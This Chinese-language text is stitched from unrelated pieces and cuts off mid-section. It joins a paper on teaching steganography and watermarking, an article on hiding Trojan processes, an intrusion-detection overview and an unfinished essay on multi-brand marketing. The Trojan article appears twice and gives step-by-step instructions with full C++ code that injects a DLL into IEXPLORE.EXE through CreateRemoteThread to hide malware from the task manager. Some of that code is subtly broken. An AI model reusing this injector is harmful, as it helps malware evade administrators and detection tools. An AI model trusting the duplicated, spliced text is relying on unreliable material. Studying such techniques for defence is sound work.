隨著網絡中信息安全事件的不斷升溫,網絡安全教育也越來越受到高校重視。各大高校紛紛開設該類課程。本校計算機科學與技術、信息工程等專業都相繼開設《網絡與信息安全》、《信息安全》、《信息安全技術》等課程,普及網絡安全知識,提高學生的網絡安全技能,增加網絡安全意識。以《網絡與信息安全》課程為例,課程分配學分為4.0,采用“2+2”模式教學,其中理論2.0為課堂教學和課堂討論課時,實驗2.0為實驗課時,即每周理論2節課,單周理論課時,雙周討論課,實驗課每周2節課。該課程的體系結構如圖1所示。[1,2]
教學過程中的基礎內容
《網絡與信息安全》課程分為三大模塊:①網絡安全基本知識概述。該模塊主要講述了網絡安全的發展和現狀問題,列舉網絡安全問題引發的各種不同影響的案例。②網絡攻擊技術。該模塊主要講述網絡中的一些攻擊現象、攻擊行為以及攻擊工具等。③密碼學模塊。該模塊主要講述古典密碼學和現代密碼學的一些應用,以及信息隱藏技術的一些實際作用等。④網絡防護技術。該模塊主要講述網絡中針對安全的一些防護措施,如防火墻、入侵監測系統等。
以信息隱藏技術為例,該部分內容在整個課程中非常重要,它將一些保密或重要的信息隱藏到另外一個可以公開的媒體之中,如把指定的信息隱藏于數字化的圖像、聲音或文本當中,充分利用人們的“所見即所得”的心理,來迷惑惡意的攻擊者。近幾年來,信息隱藏技術不斷發展,越來越多地應用在生活中,如隱寫術、數字水印、數字指紋、隱藏信道、閾下信道、低截獲概率和匿名通信等,是目前較熱的話題。[3,4]
在課程中這部分內容是整個課程的重點、難點之一,教學過程采用了比較、舉例等方法,課時分配――理論教學:討論:實驗=1:1:2,理論講授以圖1中的知識框架為主線,算法原理及實現方法,討論和實驗結合中軟吉大的網絡信息安全系統進行教學。綜合起來可以把這部分內容分為以下幾部分。
1.信息隱藏位圖法
位圖法目前使用越來越少,但作為一種基礎信息隱藏方法,仍有較高的教學應用價值。該方法作為課程中的一個基本知識點,要求學生掌握它的基本原理,并能通過一個案例,掌握主要運算過程如下:
例如,一幅24位BMP圖像,文件頭和圖像數據由54字節組成,文件頭不能隱藏信息,從第55字節開始為圖像數據部分,這部分可以隱藏信息。圖像數據部分是由一系列的8位二進制數所組成,因為每個8位二進制數中“1”的個數只有奇數或偶數兩種可能性,因此若一個字節中“1”的個數為奇數,則稱該字節為奇性字節,用“1”表示;若一個字節中“1”的個數為偶數,則稱該字節為偶性字節,用“0”表示。我們用每個字節的奇偶性來表示隱藏的信息。
設一段24位BMP文件的數據為:01100110,00111100,10001111,00011010,00000000,10101011,00111110,10110000,則其字節的奇偶排序為:0,0,1,1,0,1,1,1.現在需要隱藏16進制信息4F,由于4F轉化為8位二進制為01001111,將這兩個數列相比較,發現第2,3,4,5位不一致,于是對這段24位BMP文件數據的某些字節的奇偶性進行調制,使其與4F轉化的8位二進制相一致:第2位:將00111100變為00111101,則該字節由偶變為奇;第3位:將10001111變為10001110,則該字節由奇變為偶;第4位:將00011010變為00011011,則該字節由奇變為偶;第5位:將00000000變為00000001,則該字節由偶變為奇。
經過變化,8個字節便隱藏了一個字節的信息,這樣就能很好地將信息隱藏在位圖中了。當然逆向提取隱藏信息需要花費更長的時間。
2.LSB水印提取
LSB(最低有效位)算法是在位圖法的基礎上將輸入的信號打亂,并按照一定的分配規則使嵌入的信息能夠散布于圖像的所有像素點上,增加破壞和修改水印的難度。水印信號嵌入模型如圖2,水印信號檢測模型如圖3。
3.DCT變換域算法
DCT變換域算法是這一類算法的總稱,在它下面的具體的算法會有一些不同。下面介紹一種基于模運算的數字水印算法。該方法將水印作為二值圖像(每一像元只有兩種可能的數值或者灰度等級狀態的圖像)進行處理,依據圖像在進行DCT變換后系數的統計來選取適當的閾值,通過模處理加入水印。此算法的特點是在水印檢測時不需要原始圖像(如圖4)。
模擬主動水印攻擊教學過程
通過基礎知識的學習,學生對信息隱藏技術已經有了一定的了解,為了加深記憶,使知識應用得更好,在這部分課程最后增加了一個模擬主動水印攻擊的教學模塊。該模塊主要應用前期的知識完成。常見的水印攻擊方法有:移去攻擊、幾何攻擊、密碼攻擊、協議攻擊(如圖5)。
通過模擬攻擊實驗,學生對數字隱藏技術有了更深的了解,對各種算法增加了興趣。并在課堂上針對結果展開討論。下頁圖6為實驗模擬攻擊后的有效結果之一。
選用LSB或者DCT進行水印攻擊,測試可以顯示如下頁圖6效果。
教學成效
通過對課程中信息隱藏技術教學的改進,學生對比較難懂的數字水印部分內容有了更深一步的了解。通過改革,不僅充分調動了學生的積極性,培養了自學能力,開發了創新能力,還鍛煉了學生的團隊合作意識和實踐能力。攻擊中涉及算法的選擇、操作的選擇、速度的快慢,學生都能通過團隊合作完成。學生在實踐過程中強烈感受到了成功感和自信感。
結束語
本文以信息隱藏技術內容教學為例,闡述了三種不同的信息隱藏技術的基本知識點,分析了它們之間的關聯性和區別,提高了學生的團隊合作能力和創新思維的培養,加強了學生的學習興趣。此外,本模式將教學與科研能力培養相融合,更多地引發了學生的思考。該教學模式可推廣到其他課程中。
參考文獻:
[1]李繼芳,奚李峰,董晨.IPR―CDIO環境的計算機工程教育研究[J].計算機教育,2009(18).
[2]李繼芳,奚李峰,殷偉鳳,高昆.基于合作式學習的計算機導論課程教學[J].計算機教育,2008(10).
關鍵字進程線程木馬動態鏈接庫
木馬程序(也稱后門程序)是能被控制的運行在遠程主機上的程序,由于木馬程序是運行在遠程主機上,所以進程的隱藏無疑是大家關心的焦點。
本文分析了WindowsNT/2000系統下進程隱藏的基本技術和方法,并著重討論運用線程嫁接技術如何實現WindowsNT/2000系統中進程的隱藏。
1基本原理
在WIN95/98中,只需要將進程注冊為系統服務就能夠從進程查看器中隱形,可是這一切在WindowsNT/2000中卻完全不同,無論木馬從端口、啟動文件上如何巧妙地隱藏自己,始終都不能躲過WindowsNT/2000的任務管理器,WindowsNT/2000的任務管理器均能輕松顯示出木馬進程,難道在WindowsNT/2000下木馬真的再也無法隱藏自己的進程了?我們知道,在WINDOWS系統下,可執行文件主要是Exe和Com文件,這兩種文件在運行時都有一個共同點,會生成一個獨立的進程,尋找特定進程是我們發現木馬的方法之一,隨著入侵檢測軟件的不斷發展,關聯進程和SOCKET已經成為流行的技術,假設一個木馬在運行時被檢測軟件同時查出端口和進程,我們基本上認為這個木馬的隱藏已經完全失敗。在WindowsNT/2000下正常情況用戶進程對于系統管理員來說都是可見的,要想做到木馬的進程隱藏,有兩個辦法,第一是讓系統管理員看不見你的進程;第二是不使用進程。本文以第二種方法為例加以討論,其基本原理是將自已的木馬以線程方式嫁接于遠程進程之中,遠程進程則是合法的用戶程序,這樣用戶管理者看到的只是合法進程,而無法發現木馬線程的存在,從而達到隱藏的目的。
2實現方法
為了弄清實現方法,我們必須首先了解Windows系統的另一種"可執行文件"----DLL,DLL是DynamicLinkLibrary(動態鏈接庫)的縮寫,DLL文件是Windows的基礎,因為所有的API函數都是在DLL中實現的。DLL文件沒有程序邏輯,是由多個功能函數構成,它并不能獨立運行,一般都是由進程加載并調用的。因為DLL文件不能獨立運行,所以在進程列表中并不會出現DLL,假設我們編寫了一個木馬DLL,并且通過別的進程來運行它,那么無論是入侵檢測軟件還是進程列表中,都只會出現那個進程而并不會出現木馬DLL,如果那個進程是可信進程,(例如瀏覽器程序IEXPLORE.EXE,沒人會懷疑它是木馬吧?)那么我們編寫的DLL作為那個進程的一部分,也將成為被信賴的一員,也就達到了隱藏的目的。
運行DLL方法有多種,但其中最隱蔽的方法是采用動態嵌入技術,動態嵌入技術指的是將自己的代碼嵌入正在運行的進程中的技術。理論上來說,在Windows中的每個進程都有自己的私有內存空間,別的進程是不允許對這個私有空間進行操作的,但是實際上,我們仍然可以利用種種方法進入并操作進程的私有內存。動態嵌入技術有多種如:窗口Hook、掛接API、遠程線程等,這里介紹一下遠程線程技術,它只要有基本的進線程和動態鏈接庫的知識就可以很輕松地完成動態嵌入。
遠程線程技術指的是通過在另一個進程中創建遠程線程的方法進入那個進程的內存地址空間。我們知道,在進程中,可以通過CreateThread函數創建線程,被創建的新線程與主線程(就是進程啟動時被同時自動建立的那個線程)共享地址空間以及其他的資源。但是很少有人知道,通過CreateRemoteThread也同樣可以在另一個進程內創建新線程,被創建的遠程線程同樣可以共享遠程進程(是遠程進程)的地址空間,所以,實際上,我們通過一個遠程線程,進入了遠程進程的內存地址空間,也就擁有了那個遠程進程相當的權限。
3實施步驟
1)用Process32Next()函數找到宿主進程,獲取宿主進程ID,并用
OpenProcess()函數打開宿主進程。
2)用VirtualAllocEx()函數分配遠程進程地址空間中的
內存。
3)用WriteProcessMemory()函數將待隱藏的DLL的路徑名。
4)拷貝到步驟二已經分配的內存中。
5)用GetProcAddress()函數獲取LoadlibraryA()函數的實地址(在kernel32.dll中)。
6)用CreateRemoteThread()函數在遠程進程中創建一個線程。
7)它調用正確的LoadlibraryA()函數。
8)為它傳遞步驟二中分配的內存地址。
4具體實例
下面是在C++Builder4.0環境下編寫的運用遠程線程技術隱藏木馬的程序代碼:
#include<vcl.h>
#include<windows.h>
#include<stdio.h>
#include<tlhelp32.h>//該頭文件包涵了進程操作的API函數
#pragmahdrstop
#include"Unit1.h"
#pragmapackage(smart_init)
#pragmaresource"*.dfm"
InsistingpszLibFileName;//存放待隱藏的DLL文件名
HANDLEhProcessSnap=NULL;//進程快照句柄
HANDLEhRemoteProcess;//遠程進程句柄
LPVOIDpszLibFileRemote;//遠程進程中分配給文件名的空間
HMODULEphmd;//存放kernel32.dll句柄
HANDLEhRemoteThread1=NULL;//存放遠程線程句柄
TForm1*Form1;
//---------------------------------------------------------
__fastcallTForm1::TForm1(TComponent*Owner)
:TForm(Owner)
{
}
//---------------------------------------------------------
void__fastcallTForm1::Button1Click(TObject*Sender
{
PROCESSENTRY32pe32={0};
DWORDdwRemoteProcessId;
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//打開進程快照
if(hProcessSnap==(HANDLE)-1)
{
MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);
exit(0);
}//失敗返回
pe32.dwSize=sizeof(PROCESSENTRY32);
if(Process32Fi
rst(hProcessSnap,&pe32))//獲取第一個進程
{
do{
AnsiStringte;
te=pe32.szExeFile;
if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))
//找到宿主進程,以IEXPLORE.EXE為例
{dwRemoteProcessId=pe32.th32ProcessID;
break;
}
}
while(Process32Next(hProcessSnap,&pe32));//獲取下一個進程
}
else
{
MessageBox(NULL,"取第一個進程失敗","",MB_OK);
exit(0);
}
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM
_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
//打開遠程進程
pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";
//假設hide.dll是待隱藏的進程
intcb=(1+pszLibFileName.Length())*sizeof(char);//計算dll文件名長度
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,
MEM_COMMIT,PAGE_READWRITE);
//申請存放文件名的空間
BOOLReturnCode=WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);
//把dll文件名寫入申請的空間
phmd=GetModuleHandle("kernel32.dll");
LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)
GetProcAddress(phmd,"LoadLibraryA");
//獲取動態鏈接庫函數地址
hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,
pfnStartAddr,pszLibFileRemote,0,NULL);
//創建遠程線
if(hRemoteThread1!=NULL)
CloseHandle(hRemoteThread1);//關閉遠程線程
if(hProcessSnap!=NULL)
CloseHandle(hProcessSnap);//關閉進程快照
}
該程序編譯后命名為RmtDll.exe,運行時點擊界面上的按鈕即可。
至此,遠程嵌入順利完成,為了試驗我們的hide.dll是不是已經正常地在遠程線程運行,我同樣在C++Builder4.0環境下編寫并編譯了下面的hide.dll作為測試:
nclude<vcl.h>
#include<windows.h>
#pragmahdrstop
#pragmaargsused
BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)
{
charszProcessId[64];
switch(reason)
{
caseDLL_PROCESS_ATTACH:
{//獲取當前進程ID
itoa(GetCurrentProcessId(),szProcessId,10);
MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);
break;
}
default:
}
returnTRUE;
}
當使用RmtDll.exe程序將這個hide.dll嵌入IEXPLORE.EXE進程后假設PID=1208),該測試DLL彈出了1208字樣的確認框,同時使用PS工具
也能看到:
ProcessID:1208
C:\WINNT\IEXPLORE.EXE(0x00400000)
……
C:\WINNT\hide.dll(0x100000000)
……
這證明hide.dll已經在IEXPLORE.EXE進程內正確地運行了。上面程序的頭文件由編譯器自動生成,未作改動,故略之。
5結束語
進程隱藏技術和方法有很多,而且這一技術發展也相當快,本文僅從一個側面加以討論,希望通過這一探討讓我們對進程隱藏技術有一個更清楚的認識,同時也為我們防范他人利用進程隱藏手段非法入侵提供參考,本文拋磚引玉,不當之處誠懇批評指正。
關鍵字進程線程木馬動態鏈接庫
木馬程序(也稱后門程序)是能被控制的運行在遠程主機上的程序,由于木馬程序是運行在遠程主機上,所以進程的隱藏無疑是大家關心的焦點。
本文分析了WindowsNT/2000系統下進程隱藏的基本技術和方法,并著重討論運用線程嫁接技術如何實現WindowsNT/2000系統中進程的隱藏。
1基本原理
在WIN95/98中,只需要將進程注冊為系統服務就能夠從進程查看器中隱形,可是這一切在WindowsNT/2000中卻完全不同,無論木馬從端口、啟動文件上如何巧妙地隱藏自己,始終都不能躲過WindowsNT/2000的任務管理器,WindowsNT/2000的任務管理器均能輕松顯示出木馬進程,難道在WindowsNT/2000下木馬真的再也無法隱藏自己的進程了?我們知道,在WINDOWS系統下,可執行文件主要是Exe和Com文件,這兩種文件在運行時都有一個共同點,會生成一個獨立的進程,尋找特定進程是我們發現木馬的方法之一,隨著入侵檢測軟件的不斷發展,關聯進程和SOCKET已經成為流行的技術,假設一個木馬在運行時被檢測軟件同時查出端口和進程,我們基本上認為這個木馬的隱藏已經完全失敗。在WindowsNT/2000下正常情況用戶進程對于系統管理員來說都是可見的,要想做到木馬的進程隱藏,有兩個辦法,第一是讓系統管理員看不見你的進程;第二是不使用進程。本文以第二種方法為例加以討論,其基本原理是將自已的木馬以線程方式嫁接于遠程進程之中,遠程進程則是合法的用戶程序,這樣用戶管理者看到的只是合法進程,而無法發現木馬線程的存在,從而達到隱藏的目的。
2實現方法
為了弄清實現方法,我們必須首先了解Windows系統的另一種"可執行文件"----DLL,DLL是DynamicLinkLibrary(動態鏈接庫)的縮寫,DLL文件是Windows的基礎,因為所有的API函數都是在DLL中實現的。DLL文件沒有程序邏輯,是由多個功能函數構成,它并不能獨立運行,一般都是由進程加載并調用的。因為DLL文件不能獨立運行,所以在進程列表中并不會出現DLL,假設我們編寫了一個木馬DLL,并且通過別的進程來運行它,那么無論是入侵檢測軟件還是進程列表中,都只會出現那個進程而并不會出現木馬DLL,如果那個進程是可信進程,(例如瀏覽器程序IEXPLORE.EXE,沒人會懷疑它是木馬吧?)那么我們編寫的DLL作為那個進程的一部分,也將成為被信賴的一員,也就達到了隱藏的目的。
運行DLL方法有多種,但其中最隱蔽的方法是采用動態嵌入技術,動態嵌入技術指的是將自己的代碼嵌入正在運行的進程中的技術。理論上來說,在Windows中的每個進程都有自己的私有內存空間,別的進程是不允許對這個私有空間進行操作的,但是實際上,我們仍然可以利用種種方法進入并操作進程的私有內存。動態嵌入技術有多種如:窗口Hook、掛接API、遠程線程等,這里介紹一下遠程線程技術,它只要有基本的進線程和動態鏈接庫的知識就可以很輕松地完成動態嵌入。
遠程線程技術指的是通過在另一個進程中創建遠程線程的方法進入那個進程的內存地址空間。我們知道,在進程中,可以通過CreateThread函數創建線程,被創建的新線程與主線程(就是進程啟動時被同時自動建立的那個線程)共享地址空間以及其他的資源。但是很少有人知道,通過CreateRemoteThread也同樣可以在另一個進程內創建新線程,被創建的遠程線程同樣可以共享遠程進程(是遠程進程)的地址空間,所以,實際上,我們通過一個遠程線程,進入了遠程進程的內存地址空間,也就擁有了那個遠程進程相當的權限。
3實施步驟
1)用Process32Next()函數找到宿主進程,獲取宿主進程ID,并用
OpenProcess()函數打開宿主進程。
2)用VirtualAllocEx()函數分配遠程進程地址空間中的
內存。
3)用WriteProcessMemory()函數將待隱藏的DLL的路徑名。
4)拷貝到步驟二已經分配的內存中。
5)用GetProcAddress()函數獲取LoadlibraryA()函數的實地址(在kernel32.dll中)。
6)用CreateRemoteThread()函數在遠程進程中創建一個線程。
7)它調用正確的LoadlibraryA()函數。
8)為它傳遞步驟二中分配的內存地址。
4具體實例
下面是在C++Builder4.0環境下編寫的運用遠程線程技術隱藏木馬的程序代碼:
#include<vcl.h>
#include<windows.h>
#include<stdio.h>
#include<tlhelp32.h>//該頭文件包涵了進程操作的API函數
#pragmahdrstop
#include"Unit1.h"
#pragmapackage(smart_init)
#pragmaresource"*.dfm"
InsistingpszLibFileName;//存放待隱藏的DLL文件名
HANDLEhProcessSnap=NULL;//進程快照句柄
HANDLEhRemoteProcess;//遠程進程句柄
LPVOIDpszLibFileRemote;//遠程進程中分配給文件名的空間
HMODULEphmd;//存放kernel32.dll句柄
HANDLEhRemoteThread1=NULL;//存放遠程線程句柄
TForm1*Form1;
//---------------------------------------------------------
__fastcallTForm1::TForm1(TComponent*Owner)
:TForm(Owner)
{
}
//---------------------------------------------------------
void__fastcallTForm1::Button1Click(TObject*Sender
{
PROCESSENTRY32pe32={0};
DWORDdwRemoteProcessId;
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//打開進程快照
if(hProcessSnap==(HANDLE)-1)
{
MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);
exit(0);
}//失敗返回
pe32.dwSize=sizeof(PROCESSENTRY32);
if(Process32Fi
rst(hProcessSnap,&pe32))//獲取第一個進程
{
do{
AnsiStringte;
te=pe32.szExeFile;
if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))
//找到宿主進程,以IEXPLORE.EXE為例
{dwRemoteProcessId=pe32.th32ProcessID;
break;
}
}
while(Process32Next(hProcessSnap,&pe32));//獲取下一個進程
}
else
{
MessageBox(NULL,"取第一個進程失敗","",MB_OK);
exit(0);
}
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM
_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
//打開遠程進程
pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";
//假設hide.dll是待隱藏的進程
intcb=(1+pszLibFileName.Length())*sizeof(char);//計算dll文件名長度
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,
MEM_COMMIT,PAGE_READWRITE);
//申請存放文件名的空間
BOOLReturnCode=WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);
//把dll文件名寫入申請的空間
phmd=GetModuleHandle("kernel32.dll");
LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)
GetProcAddress(phmd,"LoadLibraryA");
//獲取動態鏈接庫函數地址
hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,
pfnStartAddr,pszLibFileRemote,0,NULL);
//創建遠程線
if(hRemoteThread1!=NULL)
CloseHandle(hRemoteThread1);//關閉遠程線程
if(hProcessSnap!=NULL)
CloseHandle(hProcessSnap);//關閉進程快照
}
該程序編譯后命名為RmtDll.exe,運行時點擊界面上的按鈕即可。
至此,遠程嵌入順利完成,為了試驗我們的hide.dll是不是已經正常地在遠程線程運行,我同樣在C++Builder4.0環境下編寫并編譯了下面的hide.dll作為測試:
nclude<vcl.h>
#include<windows.h>
#pragmahdrstop
#pragmaargsused
BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)
{
charszProcessId[64];
switch(reason)
{
caseDLL_PROCESS_ATTACH:
{//獲取當前進程ID
itoa(GetCurrentProcessId(),szProcessId,10);
MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);
break;
}
default:
}
returnTRUE;
}
當使用RmtDll.exe程序將這個hide.dll嵌入IEXPLORE.EXE進程后假設PID=1208),該測試DLL彈出了1208字樣的確認框,同時使用PS工具
也能看到:
ProcessID:1208
C:\WINNT\IEXPLORE.EXE(0x00400000)
……
C:\WINNT\hide.dll(0x100000000)
……
這證明hide.dll已經在IEXPLORE.EXE進程內正確地運行了。上面程序的頭文件由編譯器自動生成,未作改動,故略之。
5結束語
進程隱藏技術和方法有很多,而且這一技術發展也相當快,本文僅從一個側面加以討論,希望通過這一探討讓我們對進程隱藏技術有一個更清楚的認識,同時也為我們防范他人利用進程隱藏手段非法入侵提供參考,本文拋磚引玉,不當之處誠懇批評指正。
信息網絡和安全體系是信息化健康發展的基礎和保障。但是,隨著信息化應用的深入、認識的提高和技術的發展,現有信息網絡系統的安全性建設已提上工作日程。
入侵攻擊有關方法,主要有完成攻擊前的信息收集、完成主要的權限提升完成主要的后門留置等,下面僅就包括筆者根據近年來在網絡管理中有關知識和經驗,就入侵攻擊的對策及檢測情況做一闡述。論文大全。
對入侵攻擊來說,掃描是信息收集的主要手段,所以通過對各種掃描原理進行分析后,我們可以找到在攻擊發生時數據流所具有的特征。
1、利用數據流特征來檢測攻擊的思路
掃描時,攻擊者首先需要自己構造用來掃描的IP數據包,通過發送正常的和不正常的數據包達到計算機端口,再等待端口對其響應,通過響應的結果作為鑒別。我們要做的是讓IDS系統能夠比較準確地檢測到系統遭受了網絡掃描。考慮下面幾種思路:
(1)特征匹配
找到掃描攻擊時數據包中含有的數據特征,可以通過分析網絡信息包中是否含有端口掃描特征的數據,來檢測端口掃描的存在。如UDP端口掃描嘗試:content:“sUDP”等。
(2)統計分析
預先定義一個時間段,在這個時間段內如發現了超過某一預定值的連接次數,認為是端口掃描。
(3)系統分析
若攻擊者對同一主機使用緩慢的分布式掃描方法,間隔時間足夠讓入侵檢測系統忽略,不按順序掃描整個網段,將探測步驟分散在幾個會話中,不導致系統或網絡出現明顯異常,不導致日志系統快速增加記錄,那么這種掃描將是比較隱秘的。這樣的話,通過上面的簡單的統計分析方法不能檢測到它們的存在,但是從理論上來說,掃描是無法絕對隱秘的,若能對收集到的長期數據進行系統分析,可以檢測出緩慢和分布式的掃描。
2、檢測本地權限攻擊的思路
行為監測法、文件完備性檢查、系統快照對比檢查是常用的檢測技術。虛擬機技術是下一步我們要研究的重點方向。
(1)行為監測法
由于溢出程序有些行為在正常程序中比較罕見,因此可以根據溢出程序的共同行為制定規則條件,如果符合現有的條件規則就認為是溢出程序。行為監測法可以檢測未知溢出程序,但實現起來有一定難度,不容易考慮周全。行為監測法從以下方面進行有效地監測:一是監控內存活動,跟蹤內存容量的異常變化,對中斷向量進行監控、檢測。二是跟蹤程序進程的堆棧變化,維護程序運行期的堆棧合法性。以防御本地溢出攻擊和競爭條件攻擊。
監測敏感目錄和敏感類型的文件。對來自www服務的腳本執行目錄、ftp服務目錄等敏感目錄的可執行文件的運行,進行攔截、仲裁。對這些目錄的文件寫入操作進行審計,阻止非法程序的上傳和寫入。監測來自系統服務程序的命令的執行。對數據庫服務程序的有關接口進行控制,防止通過系統服務程序進行的權限提升。論文大全。監測注冊表的訪問,采用特征碼檢測的方法,阻止木馬和攻擊程序的運行。
(2)文件完備性檢查
對系統文件和常用庫文件做定期的完備性檢查。可以采用checksum的方式,對重要文件做先驗快照,檢測對這些文件的訪問,對這些文件的完備性作檢查,結合行為檢測的方法,防止文件覆蓋攻擊和欺騙攻擊。
(3)系統快照對比檢查
對系統中的公共信息,如系統的配置參數,環境變量做先驗快照,檢測對這些系統變量的訪問,防止篡改導向攻擊。
(4)虛擬機技術
通過構造虛擬x86計算機的寄存器表、指令對照表和虛擬內存,能夠讓具有溢出敏感特征的程序在虛擬機中運行一段時間。論文大全。這一過程可以提取與有可能被懷疑是溢出程序或與溢出程序相似的行為,比如可疑的跳轉等和正常計算機程序不一樣的地方,再結合特征碼掃描法,將已知溢出程序代碼特征庫的先驗知識應用到虛擬機的運行結果中,完成對一個特定攻擊行為的判定。
虛擬機技術仍然與傳統技術相結合,并沒有拋棄已知的特征知識庫。虛擬機的引入使得防御軟件從單純的靜態分析進入了動態和靜態分析相結合的境界,在一個階段里面,極大地提高了已知攻擊和未知攻擊的檢測水平,以相對比較少的代價獲得了可觀的突破。在今后相當長的一段時間內,虛擬機在合理的完整性、技術技巧等方面都會有相當的進展。目前國際上公認的、并已經實現的虛擬機技術在未知攻擊的判定上可達到80%左右的準確率。
3、后門留置檢測的常用技術
(1)對比檢測法
檢測后門時,重要的是要檢測木馬的可疑蹤跡和異常行為。因為木馬程序在目標網絡的主機上駐留時,為了不被用戶輕易發現,往往會采取各種各樣的隱藏措施,因此檢測木馬程序時必須考慮到木馬可能采取的隱藏技術并進行有效地規避,才能發現木馬引起的異常現象從而使隱身的木馬“現形”。常用的檢測木馬可疑蹤跡和異常行為的方法包括對比檢測法、文件防篡改法、系統資源監測法和協議分析法等。
(2)文件防篡改法
文件防篡改法是指用戶在打開新文件前,首先對該文件的身份信息進行檢驗以確保沒有被第三方修改。文件的身份信息是用于惟一標識文件的指紋信息,可以采用數字簽名或者md5檢驗和的方式進行生成。
(3)系統資源監測法
系統資源監測法是指采用監控主機系統資源的方式來檢測木馬程序異常行為的技術。由于黑客需要利用木馬程序進行信息搜集,以及滲透攻擊,木馬程序必然會使用主機的一部分資源,因此通過對主機資源(例如網絡、CPU、內存、磁盤、USB存儲設備和注冊表等資源)進行監控將能夠發現和攔截可疑的木馬行為。
(4)協議分析法
協議分析法是指參照某種標準的網絡協議對所監聽的網絡會話進行對比分析,從而判斷該網絡會話是否為非法木馬會話的技術。利用協議分析法能夠檢測出采取了端口復用技術進行端口隱藏的木馬。
參考文獻:
[1]張普兵,郭廣猛,廖成君.Internet中的電子欺騙攻擊及其防范[J].計算機應用,2001,21(1):32-34.
[2]蘇一丹,李桂.基于DFA的大規模入侵建模方法研究[J].計算機工程與應用,2003,39(28).
二、多品牌策略的優點
多品牌策略在實踐中屢見不鮮,多品牌策略的優點很多,主要有:
(一)多品牌具有較強的靈活性。沒有一種產品是十全十美的,也沒有一個市場是無懈可擊的。浩瀚的市場海洋,為企業提供了許多平等競爭的機會,關鍵在于企業能否及時抓住機遇,在市場上搶占一席之地。見縫插針就是多品牌靈活性的一種具體表現。
(二)多品牌能充分適應市場的差異性。消費者的需求是千差萬別的、復雜多樣的,不同的地區有不同的風俗習慣;不同的時間有不同的審美觀念;不同的人有不同的愛好追求,等等。
(三)多品牌有利于提高產品的市場占有率。多品牌策略最大的優勢便是通過給每一品牌進行準確定位,從而有效地占領各個細分市場。如果企業原先單一目標顧客范圍較窄,難以滿足擴大市場份額的需要,此時可以考慮推出不同檔次的品牌,采取不同的價格水平,形成不同的品牌形象,以抓住不同偏好的消費者。
多品牌策略不僅僅是企業滿足消費需求的被動選擇,也是企業制定競爭戰略的主動選擇。對市場攻擊者和挑戰者而言,其搶占市場的一個慣用伎倆就是發展出一個專門針對某一細分市場的品牌來逐漸蠶食;對市場領導者而言,與其坐等對手來占據某一細分市場,不如自己先發展出一個品牌去搶占,實施有效防御,從而鎖定不同目標消費群。
三、多品牌策略的不足
當然,每個策略都不是完美的,多品牌策略也存在著缺陷,企業若在同一市場中發展多個品牌,成本成長的速度會比收入還快,在零售商與內部資源分配上,也會遇上復雜的管理難題。在推出一項品牌之前,企業通常會比較它們預期會產生的額外收入以及行銷該品牌的成本。這類成本通常超乎主管的想像,因為“多品牌”策略有一項嚴重的限制;它會因不具規模經濟而受害。一家公司會因在一個市場中推出數個品牌,而招致隱藏的成本,而且在事情發展超過某一點之后,就會有綁手綁腳之苦。
盡管隱藏成本的累積速度相當緩慢,但如果公司將太多品牌塞入這個產品類別,隱藏的成本就出現了。隱藏成本有四種可能呈現方式:
(一)成本重疊。當企業無法透過獨一無二的方式為每一個品牌進行定位時,成本就會攀升。通常,品牌會在特色、屬性或價格方面出現重疊,只是企業主管未意識到罷了。這些品牌彼此競爭的程度,和它們與對手品牌之間的競爭程度不相上下,而且最后通常演變為彼此互相吞噬。如此一來,公司成本的上升速度會比收入成長速度還快。
(二)效率不彰。很多公司已經運用自己的品牌開創出幾項顯然有利可圖、但規模很小的利基。缺乏數量上的優勢并未讓他們的行銷人員擔心,因為他們力圖達成的是整個品牌組合的銷售最大化,而不是個別品牌的銷售最大化。但是,這類的公司遲遲才了解,維持一大群品牌(而且每項品牌的運營規模都相對較小)的成本,相對而言,比推銷幾項大品牌的成本要高。例如,要制造各式各樣的產品,工產方面需要大量的裝備成本以及較長的機器停工時間,從而會導致較高的生產成本。
(三)零售商利潤高昂。當企業推出多項品牌時,要為這些品牌取得零售上架空間,上架成本會高得讓你不得不打退堂鼓。大型零售廠商,如美國的沃爾瑪百貨與歐洲的家樂福,一般在每項產品分類中只將前兩大或前十大品牌上架。零售商運用領導品牌吸引顧客上門,但隨后就向購物者推銷自有品牌。
(四)管理難度加大。“多品牌”策略需要進行協調,包括從產品創新與包裝改變,到經銷商關系與零售商促銷的。大型的品牌組合也需要經常進行價格變動與庫存調整,這些工作會消耗所費不貲的管理資源。
此外,品牌擴增為企業帶來最大成本的時候,不是現在,而是在未來。那些在市場中具有大型品牌組合的公司,經理人不斷掛念在心的,往往是品牌之間的經費配置,而不是公司前途或有關競爭對手的問題。這類沖突的陰影常使企業組織揮之不去,讓他們在面臨更加專注的對手競爭時,顯得脆弱不堪。
四、多品牌策略的應用
